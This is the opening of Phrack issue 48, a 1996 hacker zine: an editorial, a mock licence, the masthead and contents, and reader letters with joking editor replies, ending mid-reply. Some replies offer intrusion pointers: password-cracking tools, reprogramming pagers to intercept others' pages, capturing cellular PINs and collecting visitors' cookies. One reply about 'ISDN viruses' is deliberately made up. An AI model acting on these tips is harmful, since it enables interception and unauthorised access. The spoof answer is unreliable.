==Phrack Magazine==
Volume Seven, Issue Forty-Eight, File 1 of 18
Issue 48 Index
___________________
P H R A C K 4 8
September 1, 1996
___________________
~ WARNING! This is a TOP SECRET-MAGIC EYES ONLY document containing
compartmenalized information essential to the national security of the
United States. EYES ONLY ACCESS to the material herein is strictly
limited to personnel possessing MAGIC-12 CLEARANCE LEVEL. Examination
or use by unauthorized personnel is strictly forbidden and is punishable
by federal law. ~
Yes, it's the annual issue of Phrack you've all been waiting for,
hopefully you have kept your security clearances current. The delay has
been a long one, much longer than anyone would have liked. Obviously
Phrack was never meant to be put out so infrequently, but the
continual pressures of daily life have taken their toll on yet
another editor. Yes, those little things like going to work, paying
the rent and all the other hassles that interfere with putting out a
large quarterly hobbbyist publication.
It finally came down to three choices: keep the status quo and put out an
issue whenever, charge per issue, or get in some new blood. Obviously the
status quo sucked, and an issue a year was just unacceptable. Charging
everyone was even more unacceptable, even though "Information wants to
be $4.95." So, that left bringing in more people to help.
The hard thing was finding people worth bringing into the fold.
There was never any shortage of people who wanted to take over the
whole magazine, but it wasn't until three of them banded together and
volunteered to take over the main editorial nightmare that it looked
like there was a light at the end of the tunnel. Voyager, maintainer of
the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and
continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and
text file author extraordinaire, came forward en masse and said,
"We'll do it."
Most of you have no idea how hard it is to put out a magazine like Phrack
with any degree of regularity. You have to track down articles, answer
tons of mail, read all kinds of news, edit the articles (most of which
were written with English as a second languge,) maintain the mailing
list, maintain the WWW site, etc. Hopefully with all the new
people involved, the new division of labor will allow everyone to
contribute and put out a magazine in a very timely fashion. (And allow poor
old Erikb to rest easy knowing the magazine is being taken care of so
he can devote more time to being a puppet-like stooge of The Man.)
In any case, you've waited long enough...here's Issue 48.
-------------------------------------------------------------------------
READ THE FOLLOWING
IMPORTANT REGISTRATION INFORMATION
Corporate/Institutional/Government: If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.
You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file. Cost is $100.00 US per user for
subscription registration. Cost of multi-user licenses will be
negotiated on a site-by-site basis.
Individual User: If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge. You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists. If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.
_______________________________________________________________
Phrack Magazine corporate/institutional/government agreement
Notice to users ("Company"): READ THE FOLLOWING LEGAL
AGREEMENT. Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement. Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.
This magazine may not be distributed by Company to any
outside corporation, organization or government agency. This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee. If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge. This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.
This Magazine is protected by United States copyright laws and
international treaty provisions. Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement. Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.
In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.
In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.
This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas. The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.
This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement. The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.
_________________________________________________________________
REGISTRATION INFORMATION REQUEST FORM
We have approximately __________ users.
Enclosed is $________
We desire Phrack Magazine distributed by (Choose one):
Electronic Mail: _________
Diskette: _________ (Include size & computer format)
Name:_______________________________ Dept:____________________
Company:_______________________________________________________
Address:_______________________________________________________
_______________________________________________________________
City/State/Province:___________________________________________
Country/Postal Code:___________________________________________
Telephone:____________________ Fax:__________________________
Send to:
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editors : Voyager, ReDragon, Daemon9
Mailboy : Erik Bloodaxe
3L33t : Mudge (See Below)
Short : Security Dynamics (NSDQ:SDTI) (See Above)
Myers-Briggs : ENTJ
News : Datastream Cowboy
Prison Consultants : Co / Dec, Tcon
Sick Sexy Horror Chick : Poppy Z. Brite
Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC,
Sendai, Steve Fleming, The Guild
Obi-1, Kwoody, Leper Messiah, Ace
SevenUp, Logik Bomb, Wile Coyote
Special Thanks To : Everyone for being patient
Phrack Magazine V. 7, #48, September 1, 1996. ISSN 1068-1035
Contents Copyright (C) 1996 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission. Phrack Magazine is made available quarterly to the
amateur computer hobbyist free of charge. Any corporate, government,
legal, or otherwise commercial usage or possession (electronic or
otherwise) is strictly prohibited without prior registration, and
is in violation of applicable US Copyright laws. To subscribe, send
email to phrack@well.com and ask to be added to the list.
Phrack Magazine
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701
ftp.fc.net (Phrack FTP Site)
/pub/phrack
http://www.fc.net/phrack (Phrack WWW Home Page)
phrack@well.com (Phrack E-mail Address)
or phrackmag on America Online
Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything. Heavens no. That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication. Yeah, that's it. :) )
* ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
Phrack goes out plaintext...you certainly can subscribe in plaintext.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----
-= Phrack 48 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by the Editorial Staff 13 K
2. Phrack Loopback / Editorial 55 K
3. Line Noise (Part I) 63 K
4. Line Noise (Part II) 51 K
5. Phrack Pro-Philes on the New Editors 23 K
6. Motorola Command Mode Information by Cherokee 38 K
7. Tandy / Radio Shack Cellular Phones by Damien Thorn 43 K
8. The Craft Access Terminal by Boss Hogg 36 K
9. Information About NT's FMT-150/B/C/D by StaTiC 22 K
10. Electronic Telephone Cards (Part I) 39 K
11. Electronic Telephone Cards (Part II) 66 K
12. Keytrap Revisited by Sendai 13 K
13. Project Neptune by Daemon9 52 K
14. IP-Spoofing Demystified by Daemon9 25 K
15. Netmon by Daemon9 21 K
16. The Truth...and Nothing but the Truth by Steve Fleming 19 K
17. International Scenes by Various Sources 33 K
18. Phrack World News by Datastream Cowboy 21 K
Total: 633 K
_______________________________________________________________________________
"The culture of criminal hackers seems to glorify behavior which would be
classified as sociopathic or frankly psychotic."
(Mich Kabay, director of education, NCSA, NCSA News, June 1996)
"The Greek word 'diarrhein,' which means 'to flow through,' describes
diarrhea very well."
(Gross-ology by Sylvia Branzei, Planet Dexter, 1996)
"Fuck you, clown!"
(Thee Joker, Defcon IV, July 28, 1996)
==Phrack Magazine==
Volume Seven, Issue Forty-Eight, File 2 of 18
Phrack Loopback
-----------------------------------------------------------------------------
This is a response to the letter from KoV included in "Line Noise
Part I" from Phrack #47. After reading this open letter, I nearly died of
laughter. The inaccuracies of KoV's story were numerous and comical.
However, from the way KoV presented themselves, they are acting as if
it was their BBS network and a government conspiracy that has gotten
them into trouble. As a result, they will appear to many as a
wrongfully persecuted group of computer users.
Apparently, KoV likes to fancy themselves as a group that
spread "open-minded" and "sociopolitical" beliefs through their BBS
network, KoVNet. They claim that they "questioned [the] authority" of
those who "tried to oppress [their] free-thinking minds." They then
state that this caused the "AmeriKKKan" government to monitor their
actions, "stalk [them] in public places", and and attempt to destroy
them "from the moment of KoV's conception."
This is ridiculous. First off, their BBS network was not
enough to cause the government to stalk them in public. If a BBS
network that contains disdain for the American government justifies
the stalking of its users, then NUMEROUS people in this country are
currently being followed in public. Therefore, KoV's claim about
their threatening BBS network is an attempt to make
themselves look bigger and more important than they were.
Now, let us look at the real reason they are facing legal
actions. KoV is blaming "false accusations from a local university"
for their troubles. However, the accusations are not false and
after you read what led them to be caught, you will reallize that KoV
was never a threat to the government.
I do not know exactly how many universities they hacked.
However, if it is one local university as they claim, it is Skidmore
in Saratoga Springs NY, the university which I attend. I myself have played
around with Skidmore's computers and do not feel any loyalty or
patriotism to my school. Therefore, it is not a grudge I am harboring
against KoV for hacking Skidmore's system that is causing me to write
this. It is merely the fact that KoV is distorting the truth in an
attempt to turn themselves into martyrs.
Personally, I cannot blame anyone for breaking into Skidmore's
system. Since Skidmore was relatively new to the Internet, their
security was very lax making it very easy to explore and play around
with the system. If KoV had any knowledge whatsoever, they would not have
been caught or even detected by Skidmore. It was their egos and lack
of knowledge that led to their investigation. I myself saw with my
own eyes how they were detected.
The system that was hacked by KoV was wopr.skidmore.edu.
Well, one day I took a look at the system logs for WOPR and saw "root
login from [some out of domain ip address]" standing out quite well.
If KoV was really so Knowledgable and dangerous, wouldn't they know how to
edit system logs? However, they did not which shows KoV is another
example of people who managed to obtain root access and did not know
what to do with it.
Some people would think, "Big deal! Just because they didn't
edit the system logs does not mean that they could ever be linked to
the crime." This is very true. However, this would have required KoV
to keep their mouths shut about the incident. Yet, they did not.
Apparently, Lord Valgamon made a post to some of the BBS networks he
frequented where he showed off about hacking Skidmore and told
everyone how he did it.
This hurt KoV greatly. As a result, a narc on the BBS network
alerted CERT about Lord Valgamon's claims who, in turn, reported the
incident to Skidmore. This caused Skidmore to now have a name, though
anonymous, to apply to the break in. Consequently, the proper
authorities became involved and they began to track down Lord Valgamon
on the BBS networks.
From the above facts, you can probably guess that the
"AmeriKKKan" government would never have a special interest in KoV
because they are the typical stereotype of an "ELiTE M0DeM d00d." If
Lord Valgamon and KoV had kept their mouths shut about the incident,
they never would have been caught. However, KoV needed to tell their
ELiTE BBS scene how bad-ass they were and, as a result, their
bad-asses are getting spanked hard.
KoV had not done any crime or brought up any controversy
against the government. Their only crime was that they were stupid.
I understand that KoV is now asking for the support of the h/p and
political groups in the scene. However, I would not recomend anyone
to give them support. There was no government conspiracy against KoV
and everything that has happened to them was brought on by their own
stupidity. Do not turn a bunch of egotistical and immature criminals
into martyrs. I will end this with the same words KoV started their
letter with: "Don't believe the hype." - Public Enemy.
Sincerely,
Mr. Sandman
[ Wow. Well, we always like to hear all sides to any story, and each
time something gets published that gets under someone else's skin, we
inevitably do. Thanks for writing! ]
-----------------------------------------------------------------------------
Hello!
Let me tell some words about myself. Computers and
telecommunications take quite important place in my life. In
past I worked as a programmer, system administrator and finally
I ran my own business selling computer hardware (now I have
closed this business because I have lost my interest for trade
and due to some financial reasons). I owned my own BBS for
several years but now I have it shut down because I do not want
support lamers leeching files 2-3 years old and having no ideas
what email is. Now almost every day I spent many hours reading
Internet newsgroups, mainly dedicated to phreaking/hacking.
A friend of mine, gave me some Phrack issues (newest was #42 of 1993).
I have read them and like them very much.
If it is possible, please drop me a line how could I subscribe
to Phrack magazine. If you do, please encrypt your reply and
send it via anonymous remailer, because now Russian government
begun to control email messages very thoroughtly.
I have private information from friend Internet provider about
the FAPSI (Federal Agency of Government Communications and
Information -- some form of Russian NSA/FCC hybrid formed from
ex-KGB agents) actions aimed to control data passed through
Internet channels in Russia. FAPSI ordered all Internet
providers in St.Petersburg to install software which task will
be to copy all messages addressed to/from persons which FAPSI
interested in and to scan for some keywords specified by FAPSI.
Providers will get their licences for providing communication
service only after installing such spy software. There is a
rumour that FAPSI has installed hidden microphones (bugs) in
providers' offices to control any "illegal" activity (free
information exchange always was illegal in USSR/Russia). I say
"rumour" because I have heared it only from one trusted source,
other information came from several trusted sources
simultaneously.
BTW, using a PGP is illegal in Russia too, because FAPSI can not
break the PGP-encrypted messages.
If you find information written above meaningful, you may use it
in your own discretion but with some precautions -- remember
that country I live in have barbaric laws and Russian
Police/Security Services have _absolute_ power to put in jail
anyone they want without any court or warrant.
[ Normally I strip out all anonymous remailers, because they
interfere with the bulk mailing process, bounce mail, and generally
screw things up...however, there are always exceptions.
The FAPSI requirements are extremely interesting to hear about. It
certainly makes sense, and I fear that our country is likewise heading
towards that goal.
If you get the chance, you ought to write more about being a hacker
in your country, since I am sure the rest of the world would be
fascinated by it. ]
-----------------------------------------------------------------------------
Greetings...
I looking for just a nibble of information...
When one logs into a remote system and gets login and passwords questions
how does one write a program to crack a password...
I'm sure that is not an easy question or even a nibble perhaps a byte...
Seeking Info,
SPY
[ Well, I can't tell you how to write a program to crack passwords
without knowing what kind of system you want to crack passwords for.
I can't tell you how to say "Where is the bathroom" in a foreign
language without first knowing what language you want to say it in.
If you are talking about UNIX passwords, there are already numerous
programs written to "crack" passwords. I would suggest you go poke around
and look for programs like "crack" or "killer cracker." If you
can't find reference to either of these on the net, then you really
ought to consider finding a new hobby. ]
-----------------------------------------------------------------------------
Wuzup! I have a pager that I don't use anymore because I can't afford the
bill. So I was wondering if there is anyway I can hook-up my pager for free
without going through a paging service.
[ Depending upon the pager, you can possibly change or add capcodes through
special programming software. Almost all Motorola pagers allow you to do
this.
This won't allow you to "really" get free service, but you can piggy back
on top of some known person's pager service (or just intercept their pages.)
The only way to get "free" service is to reactivate the pager's current
capcode in the paging system from the local provider who owns the frequency
the pager is crystaled for. ]
-----------------------------------------------------------------------------
I was browsing through Issue 47, and saw something that had caught
my eye.
""THE HACKER WAR -- LOD vs MOD"
This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and The Masters of Destruction. The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD. The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member."
A few weeks ago, I read the book Masters of Deception, a book about
the "war". Wasn't the name of the rival group Masters of Deception?
I assume that Erik would know, he appeared to be the main "villain" in
this version of the story. Any response would be appreciated.
[ I was the villain? Well corn my pone.
In any case, you should always take everything you read with a grain of
salt. In my opinion, the book was a piece of shit. Since many of the
MOD members decided to viciously attack the author, Josh Quittner, posing
as the ILF, I can only assume that they felt likewise.
So you decide for yourself about all that. Oh, and buy the damn
t-shirt. http://www.fc.net/phrack/shirts.html ]
-----------------------------------------------------------------------------
Hi Can you teach me to be a hacker i think that that would be cool so what do
you think can you teach me to be a hacker and to be cool you are one of the
biggest hackers in the world
[ No, I'm afraid as one of the biggest hackers in the world, I'm far too
important to expend any energy on the likes of you.
Now go back to your PlayStation and get better at Toshinden. ]
-----------------------------------------------------------------------------
Where culd i find some zipped red box tones? Or blue box.
CyberOptik
[ Make your own tones with the Blue Beep program.
Follow some of the links from the Phrack Home page, and you should
find this program on any number of sites. ]
-----------------------------------------------------------------------------
Hallo, din Gamle ?rn!!
(Norwegian for: Hello, you Old Eagle!!(direct.translated.)
(?rn(Eagle) is pronounced like: earn ) End of Norw. lesson.
This is a question from one viking to another; I am a newbie in the H/P
division so I spend my days(and nights!) dwnloading all i can find about the
subject. But I do have some problems with the cellular phone system over
here, NMT 900. Which your system AMPS have stolen all the good parts from!
Untill last year i could program my cellular phone, Ericsson NH 99, by
programming and switching the 27c512 prom. But now the norwegian
telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone
number used to be 12 34 56 78 (we have 8 digits), then my phone number now
has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the
owner of the phone.
I do have programs and cables for programming the phone with all 8+3 digits,
but then I have to know the 3 digits, the pin code, and I do NOT know how
to download them from the cellular traffic going around my place. Can you
help me beat the system? How do I dwnload the pin code???? I read that they
are going to use the same system i the N.Y. area within this year, so someone
is going to ask you these qst. sooner or later. Be prepared! Or is my qst.
old news? Maybe everyone knows how to do this? Exept the norwegian newbie....
Vennlig hilsen
(thats:Best regards)
Stian(Mr.Phonee) Engerud
[ I'm not sure I understand how the last 3 digits can be unknown to the
owner of the phone. If your number changes, then obviously you have to
know the new number. Are you sure this isn't just a touch-tone PIN
entered in when you use phone, like systems over here in the states?
If it is, then you'll still need some kind of ESN reader, or other means
to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone
decoder to grab the PINS as well. It's incredibly annoying.
On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems
in place. Have they upgraded their ETACS systems as well? If not,
use those. ]
-----------------------------------------------------------------------------
From: zadox@mindspring.com (Ron Zalkind)
Subject: Phrack Magazine: Strategic Marketing Partnership
I'm one of the principals of a new Internet-based, second-generation,
Information Technology service. This new Internet service debuted last week
at the Culpepper Forum in Atlanta. I'd like to propose a strategic marketing
partnership with Phrack Magazine. This proposal will spell out what it is
our service does (including a product demo), how we think a partnership with
Phrack Magazine might work, and how we can all increase profits by doing so.
Please reply to this E-mail with the name and E-mail address of the
'director of online strategy', or the 'circulation director', for Phrack
Magazine. Thank you.
Ron Zalkind, President
R.E. Zalkind & Co. Inc.
Voice: 770-518-1600
Fax: 770-642-0802
E-mail: zadox@mindspring.com (Ron Zalkind)
Ron Zalkind
[ WOW! I can't wait to hook up with THESE incredibly savvy people
so Phrack can dramatically increase our profits. Let's see, if we
make any money, we'll see a 100% increase! It's a no-lose
situation.
Man, I hate Internet mass-mailers. Don't these people attempt to qualify
their leads even a LITTLE? Strategic Marketing Opportunities with
free computer hacker magazines? Ron? Hello? ]
-----------------------------------------------------------------------------
First of all, great work on the 'zine all these years, hope to see 48
soon.
I have an article from "Airman" magazine (I believe it was the April
1996 issue), the US Air Force magazine given to military members. It
details the efforts of AFOSI (Air Force Office of Special Investigations)
to prevent hackers from breaking in to military computers. Considering
it's coming from the military, it's not too badly written (the author
actually knew the difference between "crackers" and "hackers"). I don't
have a scanner, but I'd be more than willing to snail mail it to you. I
just wanted to check and see if you guys already had it of not. If you
don't, let me know, and I'll get it to you ASAP.
Keep up the good work....
[ We would definately like to see the text from this article. Please
forward it!
In fact, if any of you readers ever come across ANYTHING you think is cool,
email it to us, or snail mail it. We love getting mail.
We will print anything cool. (And a lot of lame things too!)
Just stop sending us credit histories and password files. :) ]
-----------------------------------------------------------------------------
need access to w.gov xxx now
[ w.gov? Uh, ok, let's see:
Reserved Domain (W-GOV-DOM)
Domain Name: W.GOV
Administrative Contact, Technical Contact, Zone Contact:
Internet Assigned Numbers Authority (IANA) iana@isi.edu
(310) 822-1511
Record last updated on 02-Dec-93.
Record created on 01-Dec-93.
Do you know what this means? Duh. ]
-----------------------------------------------------------------------------
From: health@moneyworld.com
Subject: Scientific Discoveries Minimize Aging (DHEA)
http://dhea.natureplus.com
Take advantage of the amazing benefits of DHEA. In the search for the
FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and
acting 25.
Read the medical research at http://dhea.natureplus.com .A quote from
an article published by the New York Academy of Science written by Dr.
S.S.C.YEN;
"DHEA in appropriate replacement doses appears to have remedial effects
with respect to its ability to induce an anabolic growth factor, increase
muscle strength and lean body mass, activate immune function, and enhance
quality of life in aging men and women, with no significant adverse effects."
Regain the eye of the tiger! Don't wait ! Click on: http://dhea.natureplus.com
To terminate from the Health Catalog, Reply to health@moneyworld.com with
"remove" in the subject field. Bob Williams 206-269-0846
P.S. You will find a full line of Vitamin, Supplements and OTC Health
Catalog at http://natureplus.com.
[ Yet another Mass mailing! How many lame mailing lists are we on?
You have to wonder about these things.
But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH!
I need to get me some of that. A little DHEA, a little GHB, a little
DMT, and you'll look younger, feel younger, and have the brain of
a two year old.
And besides, Jesus loves acronyms. ]
-----------------------------------------------------------------------------
Do you listen to 2nur radio? If so have you ever heard a band named
SOYLENT GREEN or GOITER on any of their shows?
please email me back
thanx,
Nick
[ Nick, I hate to break it to you, but:
SOYLENT GREEN IS PEOPLE!!!
IT'S PEOPLE!!!!! ]
-----------------------------------------------------------------------------
From: Pete Shipley <shipley@dis.org>
To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu,
daddict@l5.com, dc-stuff@fc.net, dtangent@defcon.org,
emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com,
mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us,
proff@suburbia.org, root@iss.net, root@l0pht.com, root@lod.com,
root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net,
will@command.com.inter.net, zen@fish.com
Subject: Shipley owned, hacked and thrashed
Please distribute this letter freely:
This posting is being made from dis.org, and this is not forged e-mail.
Even though this mail is coming from Peter Shipley's account, I am not him.
Who am I?
That is unimportant except to say that I cannot take anymore of the
"DoC" crowd's BULLSHIT. I would like to raise an issue with them, mostly
(but not all related to the incident at defcon).
To you drunken losers at defcon who had to fuck with Netta's speech (DoC
on hold here for a second, it wasn't just them): If you didn't want to hear
Netta's speech (though in your opinion it may be monotone, boring or even
wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT. There were some people that
WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST
ASSES. How different are you now from a government that would like to
enforce censorship upon it's own people?
All I can say is "getbacks are a bitch". A few things to consider:
1. Shipley is an utter tool. His whole appearance is a front. If he's
such an awesome security specialist then why was he so easily owned? Also
I bring into question some of the motives he has for harassing Netta Gilboa.
Her boyfriend (who is currenlty in jail) was known for continually hacking
(yes CONTINUALLY hacking) Peter Shipley. I know this because I spoke with
Chris (n00gz) many times and was aware of this fact.
In my opinion Petey, anyone that is foolish enough to hire you to secure their
systems are idiots; whether it's the military, government, industry, a
business -- they should all just ask for their money back. You are a discredit
to your profession.
2. Shipley is a coward. Only cowards attack people weaker than them
but back away from a confrontation with someone of equal size or power.
Careful Peter -- next time don't piss off Bootleg, he might hurt that pretty
boy face of yours (though I admit, I would like to see it)
3. Hackman was a gob of shit. Peter Shipley has come to know his true
calling in life now (to wit: Webmaster).
4. The fangs make you look like a homo. Maybe you are (nothing against
them actually, just stating a fact).
Shipley, se7en, (ayoung, where's your piglet account?). Get a fucking life.
Maybe instead of contstantly going around "Searching for intelligent life"
perhaps you should stay home and secure your own systems. You are all owned,
now don't you feel stupid? You should. You are.
DIS.ORG == DISORGANIZED.
-- galf@upt
[ This is almost funny.
Notice I said, almost.
You have to admit though, Shipley always comes with some damn fine
women in tow. Oh the things I did in my mind to that blonde...
Something tells me that the author of this forged message could use a lot
of Shipley hand-me-downs: Women, contracts, references, etc... ]
-----------------------------------------------------------------------------
Hey, I just watched the movie Hackers, and I was just curious to know if They
used you and the LOD to models the characters in the movie after? Alot of the
handles, and choice phrases they used sounded awfully Farmiliar with what
went on, or at least what the book said went on.
Meds:}
[ Actually, meds, the screenwriter hung around with "MOD" and other people from
the New York hack scene and picked up some pointers, and then used
people like Dead Lord and Emmanuel Goldstein as technical assistants.
Or something like that.
Please, don't ever associate "LOD" with this piece of shit again. :) ]
-----------------------------------------------------------------------------
A lot of people have read the article about Joe Engressia and his time in
Memphis where he was arrested by the police and banned from his dream of
working on phone lines. Well, at the time when he was living on Union
avenue, my mother was in charge of payroll, hiring and the like at a local
switchboard. This was back in 1972 when the phone system was less of the
fuqup it is today. Well, a friend of my mother's taught Mr. Engressia how to
cook and other related houshold things despite his handicap. Shortly after
or before this, (I am unsure) he was arrested by the police. I think this
was also about the time the interview was made. Anyway, the local phone
companies would not touch him, not even to give him service. My mother,
after talking with him decided to hire him as a phone consultant. (Her
opinion of his was that "He was so brilliant, it was scary, I mean REALLY
scary.") She though he was a great "kid" (22 at the time) and was the best
consultant that they had. He worked there for three years before moving.
The last my mother heard was that he was living in a Denver high rise
working as a consultant to a corporation or something out there. I only just
started talking with my parents about this today, but I am sure that they
will tell me more of him.
Oh, and my father was good friends of Joe too, he and Joe were Ham Radio
operators here in Memphis and my father still phreaks on them so I am sure
that Mr. Engressia does too. Anyway, my father is teaching me how to hack,
and my mother is teaching me how to phreak, but she only knows a little of
outdated info and wants to get in touch with Joe. If anyone, ANYONE has any
information about Joe, or if somehow this article gets to Joe, please let me
know at the following e-mail address:
Kormed@aol.com.
[ We used to call Joe on conferences a long time ago. I could probably
dig his contact information up, but I really doubt he'd appreciate his
number being published in Phrack.
Hell, if your parents are teaching you how to hack & phreak, then certainly
they can find Joe. He was always listed in Directory Assistance when
we tracked him down years back.
Have you even really looked for him? ]
-----------------------------------------------------------------------------
quick question For Bloodaxe.
Ok, I know you probably get this Alot,but I just have to ask?...
Did you Really Date Christina Applegate?
had to ask,
[ Man, now that is a rumor that I would love to have started myself.
No. Never dated her, never met her, never talked to her, never
had any contact whatsoever. Spent some time holding up some of her
posters with one hand, but that's about it. ]
-----------------------------------------------------------------------------
do you have any info on stealing magic cookies ??
[ No, but I can trade you these magic beans for your cow. If you plant
them they will grow high into the sky, towards the castle in the clouds
where the giant lives with the talking harp and the goose that lays the
golden eggs.
Go read some of the WWW Security Lists, if you're talking about what
I think you are. There are also javascript routines that collect
navigator cookies from clients hitting your page. After briefly looking
around, I can't find the specific sites to snarf them from. Go do a
webcrawler search for WWW security or javascript security. ]
-----------------------------------------------------------------------------
Dear Phracks - I'm a Free Journalist from Germany and I'm going to write
an articel about ISDN and the possible danger which might happen to a
company etc. getting hacked by some agnets, spies etc. from other
countries. So I'm looking for indos about ISDN-Viruses, Hackers and
background infos.
Can you help me?
[ Wow, a "Free Journalist." I thought that pesky national socialist party
imprisoned all you guys.
ISDN Viruses are quite possibly the worst thing to happen to computing
since the creation of the Cellular Trojan Horse. Basically, these viruses
travel over the wires using the X.224 transport protocol, and seize the
D channel using Q.931. All SS7 data sent over the D channel is quickly
compromized and re-routed to different signal transfer points, causing
massive ANI Failure over the entire routing mesh.
Rumor has it that the Internet Liberation Front was behind these viruses
with heavy investement coming from the German Bundesnachrichtendienst's
Project Rahab. These hackers were paid with AT&T calling cards encoded
with a polymorphic encryption scheme, and cocaine.
You can quote me on this. ]
-----------------------------------------------------------------------------
Well, i wanna make an offer, and a nice deal.
i am n editor in an H/P/C magazine of HFA ( universal H/P/C
group..)
well, what i wanna offer is a joining both of the papers
2gether, OR! u want more subscribes, we'll publish ya,
but adding 1 article from ya'r paper, saying from where it is.
so, if we can make this deal, contact me asap!
10x.
[ Let me see if I understand this, your "universal H/P/C group" has
a magazine, and wants to do "Phrack" the great honor of merging
with us, or printing our articles? Wow. What a deal. You mean
by linking up with you guys, we will hit a greater audience
"universally?"
So, merging our roughly 10,000 direct email subscribers, and a roughly
75,000 more WWW or misc. readers, adding in your readers, that should
bring us up to 85,001 readers! Universally! FAN-FUCKING-TASTIC!
Are there so many rocks for you people to crawl out from under?
Sheesh! ]
-----------------------------------------------------------------------------
Hello,
I have a need for a network sniffer. Specifically, one that will
sniff IEEE-802.3 packets and TCP/IP packets. Any leads?
[ Well, gee, are there network sniffers that won't?
Go do an archie search for tcpdump. ]
-----------------------------------------------------------------------------
I was just strolling by you page: http://freeside.com/phrack.html,
and found my link "Showgirl Video" (link to vegaslive.com).
I am the creator and webmaster for the site. If I can ever be
of assistance to you let me know.
We are one of the few sites in the world that has a live stage and
live 1 on 1 conferencing in one place.
john...
[ Ya know, every time I'm in Vegas I make it out to Showgirl Video with
a bucket of quarters and a healthy dose of bad intent. I have to
congratulate you guys for going on-line. I love it when two of
my favorite things come together (smut and computers).
Unfortunately, The Vegaslive site is kind of pricey. You guys seriously
need a flat fee. I suggest you look at a SUPURB site:
http://www.peepshow.com
That place has a flat fee, all you can eat pricing structure, the way
God meant it to be. Take note, and follow suit. ]
-----------------------------------------------------------------------------
I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the
passw: 2697435 ...I need the passw to have access to SCAN or TAC
function ...please, help me!
Thank
Regards
[NCG]
[ I'm not familiar with that phone, but I'd start off looking through
Dr. Who's archive of cellular info at:
http://www.l0pht.com/radiophone
If what you are looking for isn't there, there might be a link to
somewhere that has it. ]
-----------------------------------------------------------------------------
my name is azreal! I am also known as the angel of death. why did you sell
out to the feds back when you running comsec. i think phiber optick was a
great guy and i would have been glad to work with a legend. do you know his
e-mail adress
azreal
[ Azrael? The Angel of Death? I thought Azrael was Gargamel's annoying cat.
But to answer your question, I sold out to the man ages ago for money.
Pure and simple. Once you hit puberty, you might have a need for cash.
